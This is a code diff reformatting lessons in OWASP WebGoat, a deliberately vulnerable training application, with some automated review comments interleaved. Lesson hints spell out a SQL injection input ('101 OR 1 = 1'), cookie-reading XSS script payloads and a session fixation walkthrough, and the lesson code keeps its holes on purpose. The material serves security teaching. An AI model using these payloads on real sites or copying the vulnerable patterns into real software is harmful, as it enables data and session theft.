 s.setMessage("You are not authorized to perform this function");
- //System.out.println("Authorization failure");
+ // System.out.println("Authorization failure");
 ue2.printStackTrace();
 } catch (Exception e)
 {
 // All other errors send the user to the generic error page
- //System.out.println("handleRequest() error");
+ // System.out.println("handleRequest() error");
 e.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 }
@@ -248,14 +248,16 @@ public class SQLInjection extends GoatHillsFinancial
 {
 return "LAB: SQL Injection";
 }
-
+
 @Override
- public String getSolution(WebSession s) {
+ public String getSolution(WebSession s)
+ {
 String src = null;
 try
 {
- src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
+ src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
+ false);
 } catch (IOException e)
 {
 s.setMessage("Could not find the solution file");
@@ -263,8 +265,9 @@ public class SQLInjection extends GoatHillsFinancial
 }
 return src;
 }
-
- public String getLessonSolutionFileName(WebSession s) {
+
+ public String getLessonSolutionFileName(WebSession s)
+ {
 String solutionFileName = null;
 String stage = getStage(s);
 solutionFileName = "/lesson_solutions/Lab SQL Injection/Lab " + stage + ".html";
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
index d68603934..5d08679ed 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
@@ -117,10 +117,10 @@ public class ViewProfile extends DefaultLessonAction .getInt("salary"), answer_results.getString("ccn"), answer_results .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); - //System.out.println("Profile: " + profile); + // System.out.println("Profile: " + profile); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { @@ -167,8 +167,8 @@ public class ViewProfile extends DefaultLessonAction .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results .getString("disciplined_notes"), answer_results.getString("personal_description")); /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + - * profile.getLastName() + " (" + profile.getId() + ")"); + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + + * " " + profile.getLastName() + " (" + profile.getId() + ")"); */} } catch (SQLException sqle) { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java index a712f1b98..5dd3a4ffb 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java @@ -3,7 +3,6 @@ package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -111,8 +110,8 @@ public class SameOriginPolicyProtection extends LessonAdapter
 int hiddenWGStatusInt = s.getParser().getIntParameter("hiddenWGStatus", 0);
 int hiddenGoogleStatusInt = s.getParser().getIntParameter("hiddenGoogleStatus", 0);
- //System.out.println("hiddenWGStatus:" + hiddenWGStatusInt);
- //System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt);
+ // System.out.println("hiddenWGStatus:" + hiddenWGStatusInt);
+ // System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt);
 if (hiddenWGStatusInt == 1 && hiddenGoogleStatusInt == 1)
 {
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
index f5e7e4850..b03ffe952 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
@@ -86,7 +86,7 @@ public abstract class SequentialLessonAdapter extends LessonAdapter
 } catch (Exception e)
 {
 s.setMessage("Error generating " + this.getClass().getName());
- //System.out.println(e);
+ // System.out.println(e);
 e.printStackTrace();
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SessionFixation.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SessionFixation.java
index 31e8caf74..991abfe62 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SessionFixation.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SessionFixation.java
@@ -7,7 +7,6 @@ import java.sql.ResultSet;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.Random;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -80,19 +79,19 @@ public class SessionFixation extends SequentialLessonAdapter */ protected Element createContent(WebSession s) { - if(sid.equals("") && getLessonTracker(s).getStage() > 2 ) + if (sid.equals("") && getLessonTracker(s).getStage() > 2) { getLessonTracker(s).setStage(1); } - String sid = s.getParser().getStringParameter("SID",""); + String sid = s.getParser().getStringParameter("SID", ""); if (!sid.equals("")) { this.sid = sid; } - if(!s.getParser().getStringParameter("Restart", "").equals("")) + if (!s.getParser().getStringParameter("Restart", "").equals("")) { s.add(LOGGEDIN, "false"); - s.add("SID",""); + s.add("SID", ""); this.sid = ""; } if (getLessonTracker(s).getStage() == 3) @@ -108,28 +107,28 @@ public class SessionFixation extends SequentialLessonAdapter s.add("SID", randomSid); this.sid = randomSid; } - + String name = s.getParser().getStringParameter(USER, ""); String password = s.getParser().getStringParameter(PASSWORD, ""); - if(correctLogin(name, password, s)) + if (correctLogin(name, password, s)) { getLessonTracker(s).setStage(4); - sid=""; + sid = ""; s.add(LOGGEDIN, "true"); s.add(LOGGEDINUSER, name); s.setMessage("You completed stage 3!"); } - + } - if(getLessonTracker(s).getStage() == 4) + if (getLessonTracker(s).getStage() == 4) { if (sid.equals("NOVALIDSESSION")) { - //System.out.println("STAGE 5"); + // System.out.println("STAGE 5"); getLessonTracker(s).setStage(5); } - + } if (getLessonTracker(s).getStage() == 2) @@ -183,14 +182,14 @@ public class SessionFixation extends SequentialLessonAdapter ElementContainer ec = new ElementContainer(); String mailHeader = "Mail From:   admin@webgoatfinancial.com
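Review bot: `String sid = s.getParser().getStringParameter("SID", "");` in `createContent` declares a local that shadows the `sid` field, so the `sid.equals("")` test at the top of this hunk reads the field while every later unqualified `sid` in this hunk and in the `@@ -108` hunk below reads the local; in particular the rewrapped `sid = "";` after `setStage(4)` clears only the local, and the field is reset only where `this.sid` is written explicitly. Whether that asymmetry is intended is not visible here, but the mixed references are easy to misread in a lesson whose whole point is which session id is in effect. Renaming the local (for example `String requestedSid = s.getParser().getStringParameter("SID", "");`) or qualifying every field access as `this.sid` would make the intent explicit. `createContent` starts in this hunk and, if the stage checks in `@@ -108` are still its body as they appear to be, ends outside both hunks.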

"; String mailContent = (String) s.get(MAILCONTENTNAME); - - //Reset Lesson if server was shut down - if(mailContent == null) + + // Reset Lesson if server was shut down + if (mailContent == null) { getLessonTracker(s).setStage(1); return createStage1Content(s); } - + ec.addElement(mailHeader + mailContent); return ec; @@ -202,40 +201,40 @@ public class SessionFixation extends SequentialLessonAdapter { return createStage3Content(s); } - + @Override protected Element doStage4(WebSession s) throws Exception { return createStage4Content(s); } - + @Override protected Element doStage5(WebSession s) throws Exception { - //System.out.println("Doing stage 5"); + // System.out.println("Doing stage 5"); return createStage5Content(s); } - + private Element createStage5Content(WebSession s) { - + return createMainLoginContent(s); } private Element createStage3Content(WebSession s) { - + return createMainLoginContent(s); } - + private Element createStage4Content(WebSession s) { ElementContainer ec = new ElementContainer(); - ec.addElement("

Jane has logged into her account. Go and grab her session!" + - " Use Following link to reach the login screen of the bank:



" + - "
Goat Hills Financial




"); + ec.addElement("

Jane has logged into her account. Go and grab her session!" + + " Use Following link to reach the login screen of the bank:



" + "
Goat Hills Financial




"); return ec; - //return createMainLoginContent(s); + // return createMainLoginContent(s); } private Element createStage1Content(WebSession s) @@ -395,14 +394,14 @@ public class SessionFixation extends SequentialLessonAdapter ElementContainer ec = new ElementContainer(); String name = s.getParser().getStringParameter(USER, ""); String password = s.getParser().getStringParameter(PASSWORD, ""); - + try { // Logout Button is pressed if (s.getParser().getRawParameter("logout", "").equals("true")) { s.add(LOGGEDIN, "false"); - s.add("SID",""); + s.add("SID", ""); this.sid = ""; } @@ -419,7 +418,7 @@ public class SessionFixation extends SequentialLessonAdapter } else { - if((name+password).equals("")) + if ((name + password).equals("")) { createLogInContent(ec, ""); @@ -432,7 +431,7 @@ public class SessionFixation extends SequentialLessonAdapter } } catch (Exception e) { - if((name+password).equals("")) + if ((name + password).equals("")) { createLogInContent(ec, ""); @@ -446,7 +445,6 @@ public class SessionFixation extends SequentialLessonAdapter return ec; } - /** * See if the password and corresponding user is valid * @@ -478,8 +476,7 @@ public class SessionFixation extends SequentialLessonAdapter } catch (Exception e) { e.printStackTrace(); - } - finally + } finally { try { @@ -487,13 +484,11 @@ public class SessionFixation extends SequentialLessonAdapter { connection.close(); } - } - catch (Exception e) + } catch (Exception e) { e.printStackTrace(); } } - return false; @@ -541,7 +536,7 @@ public class SessionFixation extends SequentialLessonAdapter table.addElement(tr3); loginDiv.addElement(table); ec.addElement(loginDiv); - + H2 errorTag = new H2(errorMessage); errorTag.addAttribute("align", "center"); errorTag.addAttribute("class", "info"); @@ -602,7 +597,7 @@ public class SessionFixation extends SequentialLessonAdapter userDataDiv.addElement(table); ec.addElement(userDataDiv); ec.addElement(createLogoutLink()); - + } /** 
@@ -650,8 +645,7 @@ public class SessionFixation extends SequentialLessonAdapter } catch (Exception e) { e.printStackTrace(); - } - finally + } finally { try { @@ -659,8 +653,7 @@ public class SessionFixation extends SequentialLessonAdapter { connection.close(); } - } - catch (Exception e) + } catch (Exception e) { e.printStackTrace(); } @@ -715,8 +708,6 @@ public class SessionFixation extends SequentialLessonAdapter hints.add("Stage 4: Click on the link provided"); hints.add("Stage 4: What is your actual SID?"); hints.add("Stage 4: Change the SID (NOVALIDSESSION) to the choosen one in the mail"); - - return hints; @@ -732,35 +723,32 @@ public class SessionFixation extends SequentialLessonAdapter { stage = 4; } - String instructions = "STAGE " +stage+": "; - if(stage == 1) + String instructions = "STAGE " + stage + ": "; + if (stage == 1) { - instructions += "You are Hacker Joe and " + - "you want to steal the session from Jane. " + - "Send a prepared email to the victim " + - "which looks like an official email from the bank. " + - "A template message is prepared below, you will need to add " + - "a Session ID (SID) in the link inside the email. Alter " + - "the link to include a SID.

You are: Hacker Joe"; + instructions += "You are Hacker Joe and " + "you want to steal the session from Jane. " + + "Send a prepared email to the victim " + "which looks like an official email from the bank. " + + "A template message is prepared below, you will need to add " + + "a Session ID (SID) in the link inside the email. Alter " + + "the link to include a SID.

You are: Hacker Joe"; } else if (stage == 2) { - instructions += "Now you are the victim Jane who received the email below. " + - "If you point on the link with your mouse you will see that there is a SID included. " + - "Click on it to see what happens.

You are: Victim Jane "; + instructions += "Now you are the victim Jane who received the email below. " + + "If you point on the link with your mouse you will see that there is a SID included. " + + "Click on it to see what happens.

You are: Victim Jane "; } else if (stage == 3) { - instructions += "The bank has asked you to verfy your data. Log in to see if your details are " + - "correct. Your user name is Jane and your password is tarzan.

You are: Victim Jane "; + instructions += "The bank has asked you to verfy your data. Log in to see if your details are " + + "correct. Your user name is Jane and your password is tarzan.

You are: Victim Jane "; } else if (stage == 4) { - instructions += "It is time to steal the session now. Use following link to reach Goat Hills " + - "Financial.

You are: Hacker Joe "; + instructions += "It is time to steal the session now. Use following link to reach Goat Hills " + + "Financial.

You are: Hacker Joe "; } - return (instructions); } @@ -781,7 +769,7 @@ public class SessionFixation extends SequentialLessonAdapter { return ("Session Fixation"); } - + @Override public void handleRequest(WebSession s) { @@ -793,27 +781,23 @@ public class SessionFixation extends SequentialLessonAdapter form.setEncType(""); setContent(form); } - + @Override public String getLink() { - - if(sid.equals("")) - { - return super.getLink(); - } + + if (sid.equals("")) { return super.getLink(); } return super.getLink() + "&SID=" + sid; } - private String randomSIDGenerator() { String sid = ""; - sid = String.valueOf(Math.abs(random.nextInt()%100000)); + sid = String.valueOf(Math.abs(random.nextInt() % 100000)); return sid; } - + public Element getCredits() { return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement("")); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java index 6220ec8be..f82b3b92e 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java @@ -56,8 +56,8 @@ import org.owasp.webgoat.session.WebgoatContext; * * @author asmolen * - * TODO To change the template for this generated type comment go to Window - Preferences - Java - - * Code Style - Code Templates + * TODO To change the template for this generated type comment go to Window - Preferences - + * Java - Code Style - Code Templates */ public class SoapRequest extends SequentialLessonAdapter { diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java index 9f0172a47..7d5e4bd67 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java 
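Review bot: `if (sid.equals("")) { return super.getLink(); }` in `getLink` is collapsed onto one line, the opposite of the brace-on-its-own-line layout this same commit applies everywhere else (for example `if (mailContent == null)` followed by `{` in the `@@ -183` hunk), so the formatter configuration appears to special-case short blocks. Restoring the multi-line form used for every other `if` in the file would keep the layout consistent. The `randomSIDGenerator` line in the same hunk draws session ids from `java.util.Random`; if that predictability is part of the lesson's intended weakness it deserves a one-line comment saying so, otherwise `SecureRandom` is the realistic choice for an id handed to a browser. Both methods are complete within the hunk; the class continues outside it.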
@@ -310,13 +310,13 @@ public class SqlNumericInjection extends SequentialLessonAdapter protected List getHints(WebSession s) { List hints = new ArrayList(); - hints.add("The application is taking the input from the select box and inserts it at the end of a pre-formed SQL command."); + hints + .add("The application is taking the input from the select box and inserts it at the end of a pre-formed SQL command."); hints.add("This is the code for the query being built and issued by WebGoat:

" + "\"SELECT * FROM weather_data WHERE station = \" + station "); hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + "Try appending a SQL statement that always resolves to true."); - hints.add("Try to intercept the post request with WebScarab and replace the station " + - "with 101 OR 1 = 1"); + hints.add("Try to intercept the post request with WebScarab and replace the station " + "with 101 OR 1 = 1"); return hints; } @@ -351,7 +351,7 @@ public class SqlNumericInjection extends SequentialLessonAdapter super.handleRequest(s); } catch (Exception e) { - //System.out.println("Exception caught: " + e); + // System.out.println("Exception caught: " + e); e.printStackTrace(System.out); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java index 7f71b57ea..85f2beba5 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SqlStringInjection.java @@ -273,7 +273,7 @@ public class SqlStringInjection extends SequentialLessonAdapter super.handleRequest(s); } catch (Exception e) { - //System.out.println("Exception caught: " + e); + // System.out.println("Exception caught: " + e); e.printStackTrace(System.out); } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java index 35c7b6606..e0d118f2f 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java @@ -79,7 +79,8 @@ public class StoredXss extends LessonAdapter private static int count = 1; private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted - // message + + // message /** * Adds a feature to the Message attribute of the MessageBoardScreen object 
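Review bot: `hints` followed by `.add("The application is taking the input ...")` on the next line in `getHints` wraps the call at the member access, which leaves a single-token line and a literal that still exceeds the line limit, while the other hints in the same hunk are wrapped by splitting the literal with `+`; the same `.add` wrap appears in the StoredXss `@@ -160` hunk. Splitting the literal the same way, `hints.add("The application is taking the input from the select box "` followed by `+ "and inserts it at the end of a pre-formed SQL command.");`, keeps the file consistent with the rest of the commit. `getHints` starts in this hunk and its `return hints;` is the hunk's last statement.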
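Review bot: The blank line added after `private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted` splits that trailing comment from its continuation, so the new side ends with an orphaned `// message` sitting directly above the Javadoc of the next method where it reads as a comment about that method. The comment was one sentence wrapped by an earlier formatter pass; moving it whole onto a line above the field, `// Added by Chuck Willis - used to show user who posted message`, and dropping the fragment removes the ambiguity. The field declaration is complete in the hunk; the method whose Javadoc starts at the hunk's end is outside it.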
@@ -160,7 +161,8 @@ public class StoredXss extends LessonAdapter List hints = new ArrayList(); hints.add("You can put HTML tags in your message."); hints.add("Bury a SCRIPT tag in the message to attack anyone who reads it."); - hints.add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in the message field."); + hints + .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in the message field."); hints.add("Enter this: <script>alert(document.cookie);</script> in the message field."); return hints; @@ -307,7 +309,7 @@ public class StoredXss extends LessonAdapter * Description of the Parameter * @return Description of the Return Value */ - public Element makeList(WebSession s) + public Element makeList(WebSession s) { Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); @@ -326,7 +328,7 @@ public class StoredXss extends LessonAdapter statement.setString(1, getNameroot(s.getUserName()) + "%"); statement.setString(2, getClass().getName()); ResultSet results = statement.executeQuery(); - + if ((results != null) && (results.first() == true)) { results.beforeFirst(); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java index a61d3cb8e..fac617489 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java @@ -189,7 +189,7 @@ public class ThreadSafetyProblem extends LessonAdapter super.handleRequest(s); } catch (Exception e) { - //System.out.println("Exception caught: " + e); + // System.out.println("Exception caught: " + e); e.printStackTrace(System.out); } } 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java index 6ec48f6da..3be3cc432 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java @@ -125,13 +125,14 @@ public class UncheckedEmail extends LessonAdapter sendSimulatedMail(ec, to, subject, message); } } - - if(to.length() > 0 && "webgoat.admin@owasp.org".equals(to) && message.contains(" 0 && "webgoat.admin@owasp.org".equals(to) && message.contains("